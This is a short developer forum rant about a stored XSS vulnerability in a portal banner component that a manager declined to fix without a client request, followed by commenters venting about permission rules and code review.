45

a stored XSS vuln in a banner-like component, visible in ALL the pages in the portal. Anyone can attack anyone.

HOWEVER this was not discovered by 3rd-party security specialists during latest security audit. I have escalated this to my manager and got replied that unless client actively requests this to be fixed should I do anything about it.

FFS.. it's only 2 lines of code.. And there's nothing I can do about it.

Eventualy I was transfered to another project. Now it's not my problem anymore.

Comments
  • 14
    2 lines of code?! Do you have to seek permission for every tiny code change like that?! If so that's madness. I would have just fixed it and notified management afterwards. If I got anything other than a positive response, it would have resulted in one heck of an argument.
  • 6
    @AlmondSauce Yepp, I have to get permission to push those 2 lines :) It's madness, I know...
  • 1
    @rooter Code reviews, sure. But they're generally about making sure the code committed is sensible, follows style guidelines etc. They're not a tool for management to use to decide what features or fixes should be worked on.
  • 1
    Regardless of the team you are now, create the PR, leave on them, cover your ass
Add Comment